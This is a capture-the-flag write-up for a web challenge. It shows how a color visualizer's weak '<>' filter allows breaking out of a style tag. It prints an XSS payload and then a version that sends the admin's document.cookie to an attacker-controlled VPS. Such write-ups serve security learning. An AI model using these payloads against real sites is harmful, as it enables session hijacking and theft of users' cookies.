![74ebcb8ed17db8be4ff34481a6a210aa.png](320fd670dd1845439d57d2d6a8ac9abd.png)
/admin
![03ba8f48dae28b13e3d6135b7e16db9d.png](a33833c3c1b34de4a2696506094f382f.png)
Let's check out the source of the color visualizer.
![b5c6b49a7587b503bdf6ddf89a0efbe0.png](4795d9d2f2a34345a816d4e2435b17a7.png)
In the source we can see how it's setting the background color, and that it's sanitizing the input to protect against XSS. Or is it?
I noticed in my tests that only the initial `<>` is being filtered out. Anything after that is fine.
So by closing the `<style>` element that the color value is placed in, we can inject our XSS payload.
`<></style><img src=x onerror=alert(document.cookie)>`
![5b31e3f231e70dcda24e0ac37c4936cf.png](0d3009eb17ef47d6a38cb2b9a9c55a08.png)
So we have XSS, but we want to send the cookie back to us rather than alert it.
Here is the script that I hosted on my VPS:
![47190ff94ae10196255595d93e7a0ab0.png](9b450e01a3f94f19aa05ab12a241c451.png)
And here is the new payload:
`<></style><img src=x onerror=document.location='http://REDACTED/cookie.php?c='+document.cookie>;`
So now we can pass this information through the Admin page:
URL to visit: [http://chall.csivit.com:30256/view](http://chall.csivit.com:30256/view)
Color to see: payload
![8ea6baf7cbb4aa83288691d4d269d0b5.png](dab45ef3a39d439fa0f95fa43cebc41c.png)
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #web #xss #css
Related: